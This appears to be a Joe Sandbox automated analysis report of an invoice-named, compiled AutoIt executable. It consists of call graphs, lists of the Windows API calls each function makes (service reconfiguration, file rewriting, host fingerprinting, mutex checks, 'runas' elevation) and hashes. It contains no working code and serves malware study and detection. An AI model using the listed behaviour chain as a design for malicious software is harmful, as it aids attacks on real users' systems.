111054 469665 111053->111054 111055 404f0b 74 API calls 111054->111055 111056 469679 111055->111056 111057 469109 GetSystemTimeAsFileTime 111056->111057 111058 46968c 111057->111058 111059 4696b6 111058->111059 111060 4696a1 111058->111060 111061 4696bc 111059->111061 111062 46971b 111059->111062 111063 422d55 _free 58 API calls 111060->111063 111064 468b06 116 API calls 111061->111064 111065 422d55 _free 58 API calls 111062->111065 111066 4696a7 111063->111066 111067 469713 111064->111067 111065->111068 111069 422d55 _free 58 API calls 111066->111069 111070 422d55 _free 58 API calls 111067->111070 111068->110878 111068->110880 111069->111068 111070->111068 111072 403f82 111071->111072 111076 403fa4 _memmove 111071->111076 111074 420db6 Mailbox 59 API calls 111072->111074 111073 420db6 Mailbox 59 API calls 111075 403fb8 111073->111075 111074->111076 111075->111007 111076->111073 111077->111023 111078->111026 111079->111022 111080->111030 111143 431940 111081->111143 111084 404799 111087 407d8c 59 API calls 111084->111087 111085 40477c 111086 407bcc 59 API calls 111085->111086 111088 404788 111086->111088 111087->111088 111145 407726 111088->111145 111091 420791 111092 431940 __write_nolock 111091->111092 111093 42079e GetLongPathNameW 111092->111093 111094 407bcc 59 API calls 111093->111094 111095 4072bd 111094->111095 111096 40700b 111095->111096 111097 407667 59 API calls 111096->111097 111098 40701d 111097->111098 111099 404750 60 API calls 111098->111099 111100 407028 111099->111100 111101 407033 111100->111101 111102 43e885 111100->111102 111104 403f74 59 API calls 111101->111104 111106 43e89f 111102->111106 111155 407908 61 API calls 111102->111155 111105 40703f 111104->111105 111149 4034c2 111105->111149 111108 407052 Mailbox 111108->110957 111110 404ddd 136 API calls 111109->111110 111111 40688f 111110->111111 111144 40475d GetFullPathNameW 111143->111144 111144->111084 111144->111085 111146 407734 111145->111146 111147 407d2c 59 API calls 111146->111147 111148 404794 111147->111148 111148->111091 111150 4034d4 111149->111150 111154 4034f3 _memmove 111149->111154 111152 420db6 Mailbox 59 API calls 111150->111152 111151 420db6 Mailbox 59 API calls 111153 40350a 111151->111153 111152->111154 111153->111108 111154->111151 111155->111102 111314 b8520c 111317 bacbd0 111314->111317 111316 b85211 111335 babe50 _wcslen 111317->111335 111318 bac168 111356 baa905 LocalFree 111318->111356 111320 b85d20 2 API calls 111320->111335 111321 bac78e CloseServiceHandle 111321->111335 111322 babffd StrStrIW 111322->111335 111323 bac706 StrStrIW 111323->111335 111325 babf68 StrStrIW 111325->111335 111326 bac72b StrStrIW 111326->111335 111327 bac399 StrStrIW 111332 bac3a9 111327->111332 111327->111335 111328 babf7e 111331 bac7e4 StartServiceW 111328->111331 111333 bac36b OpenServiceW 111328->111333 111330 bac0fd CloseServiceHandle 111330->111335 111331->111335 111332->111316 111333->111335 111334 bac65a ChangeServiceConfigW 111334->111335 111336 babfe9 111334->111336 111335->111316 111335->111317 111335->111318 111335->111320 111335->111321 111335->111322 111335->111323 111335->111325 111335->111326 111335->111327 111335->111328 111335->111330 111335->111331 111335->111334 111335->111336 111337 b8ce90 111335->111337 111355 baa350 CloseServiceHandle 111335->111355 111336->111316 111338 b8cc9b _wcslen 111337->111338 111338->111335 111338->111337 111339 b8d426 111338->111339 111340 b8d5c5 CreateFileW 111338->111340 111341 b8d729 GetFileSizeEx 111338->111341 111342 b8d8a1 CloseHandle 111338->111342 111343 b8d42a CloseHandle 111338->111343 111344 b8cd5c lstrcmpiW 111338->111344 111346 b85d20 VirtualAlloc VirtualFree 111338->111346 111347 b8cca0 lstrcmpiW 111338->111347 111348 b8d049 SetFilePointerEx 111338->111348 111350 b8d378 CloseHandle 111338->111350 111352 b8cfbb GetFileTime 111338->111352 111353 b8cc92 111338->111353 111354 b8d903 111338->111354 111357 b88937 VirtualAlloc VirtualFree 111338->111357 111358 b88470 VirtualAlloc VirtualFree 111338->111358 111339->111342 111339->111343 111340->111338 111341->111338 111341->111342 111342->111338 111343->111338 111344->111338 111346->111338 111347->111338 111348->111338 111350->111338 111351 bbfdfc 40 API calls 111351->111354 111352->111338 111353->111335 111354->111351 111354->111353 111355->111335 111356->111336 111357->111338 111359 401055 111364 402649 111359->111364 111362 422d40 __cinit 67 API calls 111363 401064 111362->111363 111365 407667 59 API calls 111364->111365 111366 4026b7 111365->111366 111371 403582 111366->111371 111368 402754 111370 40105a 111368->111370 111374 403416 59 API calls 2 library calls 111368->111374 111370->111362 111375 4035b0 111371->111375 111374->111368 111376 4035bd 111375->111376 111377 4035a1 111375->111377 111376->111377 111378 4035c4 RegOpenKeyExW 111376->111378 111377->111368 111378->111377 111379 4035de RegQueryValueExW 111378->111379 111380 403614 RegCloseKey 111379->111380 111381 4035ff 111379->111381 111380->111377 111381->111380 111382 401016 111387 404974 111382->111387 111385 422d40 __cinit 67 API calls 111386 401025 111385->111386 111388 420db6 Mailbox 59 API calls 111387->111388 111389 40497c 111388->111389 111390 40101b 111389->111390 111394 404936 111389->111394 111390->111385 111395 404951 111394->111395 111396 40493f 111394->111396 111398 4049a0 111395->111398 111397 422d40 __cinit 67 API calls 111396->111397 111397->111395 111399 407667 59 API calls 111398->111399 111400 4049b8 GetVersionExW 111399->111400 111401 407bcc 59 API calls 111400->111401 111402 4049fb 111401->111402 111403 407d2c 59 API calls 111402->111403 111407 404a28 111402->111407 111404 404a1c 111403->111404 111405 407726 59 API calls 111404->111405 111405->111407 111406 404a93 GetCurrentProcess IsWow64Process 111408 404aac 111406->111408 111407->111406 111409 43d864 111407->111409 111410 404ac2 111408->111410 111411 404b2b GetSystemInfo 111408->111411 111422 404b37 111410->111422 111412 404af8 111411->111412 111412->111390 111415 404ad4 111418 404b37 2 API calls 111415->111418 111416 404b1f GetSystemInfo 111417 404ae9 111416->111417 111417->111412 111419 404aef FreeLibrary 111417->111419 111420 404adc GetNativeSystemInfo 111418->111420 111419->111412 111420->111417 111423 404ad0 111422->111423 111424 404b40 LoadLibraryA 111422->111424 111423->111415 111423->111416 111424->111423 111425 404b51 GetProcAddress 111424->111425 111425->111423 111426 401078 111431 40708b 111426->111431 111428 40108c 111429 422d40 __cinit 67 API calls 111428->111429 111430 401096 111429->111430 111432 40709b __write_nolock 111431->111432 111433 407667 59 API calls 111432->111433 111434 407151 111433->111434 111435 404706 61 API calls 111434->111435 111436 40715a 111435->111436 111462 42050b 111436->111462 111439 407cab 59 API calls 111440 407173 111439->111440 111441 403f74 59 API calls 111440->111441 111442 407182 111441->111442 111443 407667 59 API calls 111442->111443 111444 40718b 111443->111444 111445 407d8c 59 API calls 111444->111445 111446 407194 RegOpenKeyExW 111445->111446 111447 43e8b1 RegQueryValueExW 111446->111447 111451 4071b6 Mailbox 111446->111451 111448 43e943 RegCloseKey 111447->111448 111449 43e8ce 111447->111449 111448->111451 111461 43e955 _wcscat Mailbox __wsetenvp 111448->111461 111450 420db6 Mailbox 59 API calls 111449->111450 111452 43e8e7 111450->111452 111451->111428 111453 40522e 59 API calls 111452->111453 111454 43e8f2 RegQueryValueExW 111453->111454 111455 43e90f 111454->111455 111458 43e929 111454->111458 111457 407bcc 59 API calls 111455->111457 111456 4079f2 59 API calls 111456->111461 111457->111458 111458->111448 111459 407de1 59 API calls 111459->111461 111460 403f74 59 API calls 111460->111461 111461->111451 111461->111456 111461->111459 111461->111460 111463 431940 __write_nolock 111462->111463 111464 420518 GetFullPathNameW 111463->111464 111465 42053a 111464->111465 111466 407bcc 59 API calls 111465->111466 111467 407165 111466->111467 111467->111439 111468 b8b180 111476 b8b0de 111468->111476 111469 b8b2a7 SetFilePointerEx 111471 b8b1df 111469->111471 111475 b8b1c6 111469->111475 111470 b8b196 111472 b8b3a6 111470->111472 111470->111475 111473 b8b328 SetFilePointerEx 111472->111473 111474 b8b3b2 111472->111474 111475->111471 111477 b8b2e0 WriteFile 111475->111477 111476->111468 111476->111469 111476->111470 111476->111473 111478 b8b253 111476->111478 111479 b8b0d0 SetFilePointerEx 111476->111479 111479->111476 111480 b8b054 111479->111480 111481 e9dff0 111495 e9bc40 111481->111495 111483 e9e0e3 111498 e9dee0 111483->111498 111501 e9f110 GetPEB 111495->111501 111497 e9c2cb 111497->111483 111499 e9dee9 Sleep 111498->111499 111500 e9def7 111499->111500 111502 e9f13a 111501->111502 111502->111497 111503 b85085 111504 b85089 111503->111504 111505 b8506f 111503->111505 111508 ba8550 111505->111508 111507 b85078 111532 ba8556 111508->111532 111509 ba8145 GetLastError 111533 ba7dd7 111509->111533 111510 ba8579 FreeSid 111510->111532 111511 ba7d37 111511->111507 111511->111511 111512 ba83fb GetUserNameW 111512->111533 111513 ba8209 GetUserNameW 111513->111511 111513->111533 111514 ba8bc1 GetLastError 111514->111532 111515 ba8986 SetEntriesInAclW 111515->111532 111516 ba7d30 111516->111511 111522 ba7d6c GetVolumeInformationW 111516->111522 111517 ba890b LocalFree 111517->111532 111518 ba89cd OpenMutexW 111518->111507 111519 ba824a GetLastError 111519->111507 111519->111533 111521 ba836e GetLastError 111521->111533 111522->111507 111523 ba8599 111523->111516 111529 ba896a wsprintfW 111523->111529 111524 ba826a 111526 ba7e06 GetComputerNameW 111524->111526 111525 ba7fd4 GetLastError 111525->111533 111526->111511 111527 ba7d20 111527->111511 111527->111516 111527->111522 111527->111526 111528 ba7d83 GetWindowsDirectoryW 111527->111528 111528->111511 111528->111516 111529->111516 111530 ba8953 AllocateAndInitializeSid 111530->111532 111531 ba7f6b GetVolumeInformationW 111531->111533 111532->111508 111532->111509 111532->111510 111532->111511 111532->111514 111532->111515 111532->111516 111532->111517 111532->111518 111532->111523 111532->111527 111532->111529 111532->111530 111532->111533 111533->111509 111533->111511 111533->111512 111533->111513 111533->111516 111533->111519 111533->111521 111533->111522 111533->111524 111533->111525 111533->111527 111533->111531 111534 43fdfc 111535 40ab30 Mailbox _memmove 111534->111535 111538 409c90 Mailbox 59 API calls 111535->111538 111555 40a057 111535->111555 111557 407de1 59 API calls 111535->111557 111560 409f37 Mailbox 111535->111560 111566 40b2b6 111535->111566 111567 409ea0 341 API calls 111535->111567 111569 44086a 111535->111569 111571 440878 111535->111571 111573 44085c 111535->111573 111574 40b21c 111535->111574 111576 420db6 59 API calls Mailbox 111535->111576 111579 40b525 111535->111579 111580 456e8f 59 API calls 111535->111580 111583 47445a 341 API calls 111535->111583 111584 47df23 111535->111584 111587 48241e 111535->111587 111603 47c193 85 API calls 2 library calls 111535->111603 111604 47c2e0 96 API calls Mailbox 111535->111604 111605 467956 59 API calls Mailbox 111535->111605 111606 47bc6b 341 API calls Mailbox 111535->111606 111607 45617e 59 API calls Mailbox 111535->111607 111538->111535 111541 440055 111608 469e4a 89 API calls 4 library calls 111541->111608 111545 40b475 111550 408047 59 API calls 111545->111550 111546 440064 111547 420db6 59 API calls Mailbox 111547->111560 111550->111555 111551 40b47a 111551->111541 111562 4409e5 111551->111562 111553 408047 59 API calls 111553->111560 111554 407667 59 API calls 111554->111560 111556 422d40 67 API calls __cinit 111556->111560 111557->111535 111558 456e8f 59 API calls 111558->111560 111559 4409d6 111613 469e4a 89 API calls 4 library calls 111559->111613 111560->111541 111560->111545 111560->111547 111560->111551 111560->111553 111560->111554 111560->111555 111560->111556 111560->111558 111560->111559 111563 40a55a 111560->111563 111600 40c8c0 341 API calls 2 library calls 111560->111600 111601 40b900 60 API calls Mailbox 111560->111601 111614 469e4a 89 API calls 4 library calls 111562->111614 111612 469e4a 89 API calls 4 library calls 111563->111612 111602 40f6a3 341 API calls 111566->111602 111567->111535 111570 409c90 Mailbox 59 API calls 111569->111570 111570->111573 111611 469e4a 89 API calls 4 library calls 111571->111611 111573->111555 111610 45617e 59 API calls Mailbox 111573->111610 111575 409d3c 60 API calls 111574->111575 111577 40b22d 111575->111577 111576->111535 111578 409d3c 60 API calls 111577->111578 111578->111566 111609 469e4a 89 API calls 4 library calls 111579->111609 111580->111535 111583->111535 111585 47cadd 130 API calls 111584->111585 111586 47df33 111585->111586 111586->111535 111588 409837 84 API calls 111587->111588 111589 482436 111588->111589 111590 407667 59 API calls 111589->111590 111591 482444 111590->111591 111592 409b3c 59 API calls 111591->111592 111593 48244f 111592->111593 111594 482479 111593->111594 111596 409837 84 API calls 111593->111596 111615 409a3c 59 API calls Mailbox 111594->111615 111597 48246a 111596->111597 111598 40784b 59 API calls 111597->111598 111598->111594 111599 482485 Mailbox 111599->111535 111600->111560 111601->111560 111602->111579 111603->111535 111604->111535 111605->111535 111606->111535 111607->111535 111608->111546 111609->111573 111610->111555 111611->111573 111612->111555 111613->111562 111614->111555 111615->111599

                                          Executed Functions

                                          Function 00BACBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d$w
                                          • API String ID: 0-2400632791
                                          • Opcode ID: 777f83ce0f2c4ab612ac65b60f240bacee60c4e15b1d48478835d76c075a3a73
                                          • Instruction ID: 81818918c468b9a559e766c234d2d9acba745378a328a79153ba5c2cde3e5a5e
                                          • Opcode Fuzzy Hash: 777f83ce0f2c4ab612ac65b60f240bacee60c4e15b1d48478835d76c075a3a73
                                          • Instruction Fuzzy Hash: 77C11525A0C384AEDE365B288C5AF793EE0DB63720F4C05D6F566AA0F3D7259C04D662
                                          Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                          • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                            • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                          • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                            • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                            • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                            • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                            • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                            • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                            • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                            • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                            • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                            • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                            • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                            • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                            • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                            • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                          • API String ID: 529118366-2806069697
                                          • Opcode ID: 255f10e69cc8df1980d2df773c135a78c85689e8f31627855df614f078967646
                                          • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                          • Opcode Fuzzy Hash: 255f10e69cc8df1980d2df773c135a78c85689e8f31627855df614f078967646
                                          • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D
                                          Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2090 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2095 404a06 2090->2095 2096 404b0b-404b0d 2090->2096 2098 404a09-404a0e 2095->2098 2097 43d767-43d773 2096->2097 2099 43d774-43d778 2097->2099 2100 404b12-404b13 2098->2100 2101 404a14 2098->2101 2103 43d77b-43d787 2099->2103 2104 43d77a 2099->2104 2102 404a15-404a4c call 407d2c call 407726 2100->2102 2101->2102 2112 404a52-404a53 2102->2112 2113 43d864-43d867 2102->2113 2103->2099 2106 43d789-43d78e 2103->2106 2104->2103 2106->2098 2108 43d794-43d79b 2106->2108 2108->2097 2110 43d79d 2108->2110 2114 43d7a2-43d7a5 2110->2114 2112->2114 2115 404a59-404a64 2112->2115 2116 43d880-43d884 2113->2116 2117 43d869 2113->2117 2118 404a93-404aaa GetCurrentProcess IsWow64Process 2114->2118 2119 43d7ab-43d7c9 2114->2119 2120 43d7ea-43d7f0 2115->2120 2121 404a6a-404a6c 2115->2121 2124 43d886-43d88f 2116->2124 2125 43d86f-43d878 2116->2125 2122 43d86c 2117->2122 2126 404aac 2118->2126 2127 404aaf-404ac0 2118->2127 2119->2118 2123 43d7cf-43d7d5 2119->2123 2132 43d7f2-43d7f5 2120->2132 2133 43d7fa-43d800 2120->2133 2128 404a72-404a75 2121->2128 2129 43d805-43d811 2121->2129 2122->2125 2130 43d7d7-43d7da 2123->2130 2131 43d7df-43d7e5 2123->2131 2124->2122 2134 43d891-43d894 2124->2134 2125->2116 2126->2127 2135 404ac2-404ad2 call 404b37 2127->2135 2136 404b2b-404b35 GetSystemInfo 2127->2136 2137 43d831-43d834 2128->2137 2138 404a7b-404a8a 2128->2138 2140 43d813-43d816 2129->2140 2141 43d81b-43d821 2129->2141 2130->2118 2131->2118 2132->2118 2133->2118 2134->2125 2147 404ad4-404ae1 call 404b37 2135->2147 2148 404b1f-404b29 GetSystemInfo 2135->2148 2139 404af8-404b08 2136->2139 2137->2118 2146 43d83a-43d84f 2137->2146 2143 404a90 2138->2143 2144 43d826-43d82c 2138->2144 2140->2118 2141->2118 2143->2118 2144->2118 2149 43d851-43d854 2146->2149 2150 43d859-43d85f 2146->2150 2155 404ae3-404ae7 GetNativeSystemInfo 2147->2155 2156 404b18-404b1d 2147->2156 2151 404ae9-404aed 2148->2151 2149->2118 2150->2118 2151->2139 2153 404aef-404af2 FreeLibrary 2151->2153 2153->2139 2155->2151 2156->2155
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 004049CD
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                          • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                          • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                          • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                          • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                          • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E
                                          Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2157 404e89-404ea1 CreateStreamOnHGlobal 2158 404ec1-404ec6 2157->2158 2159 404ea3-404eba FindResourceExW 2157->2159 2160 43d933-43d942 LoadResource 2159->2160 2161 404ec0 2159->2161 2160->2161 2162 43d948-43d956 SizeofResource 2160->2162 2161->2158 2162->2161 2163 43d95c-43d967 LockResource 2162->2163 2163->2161 2164 43d96d-43d98b 2163->2164 2164->2161
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                          • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                          • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                          • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                          • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                          • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                          Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: pbL$%I
                                          • API String ID: 3964851224-1578263234
                                          • Opcode ID: e75918543d8f8fb4d66ffa4b32f5ee6d54476b5022be24708f0abced30fc0e75
                                          • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                          • Opcode Fuzzy Hash: e75918543d8f8fb4d66ffa4b32f5ee6d54476b5022be24708f0abced30fc0e75
                                          • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                          Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                          • API String ID: 0-2838938394
                                          • Opcode ID: 5bf42d26b714625c435ed75d2a851a6bbf587f56385a40fea6e1fd74eaad2a3b
                                          • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                          • Opcode Fuzzy Hash: 5bf42d26b714625c435ed75d2a851a6bbf587f56385a40fea6e1fd74eaad2a3b
                                          • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                          Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                          • FindClose.KERNEL32(00000000), ref: 0046448B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
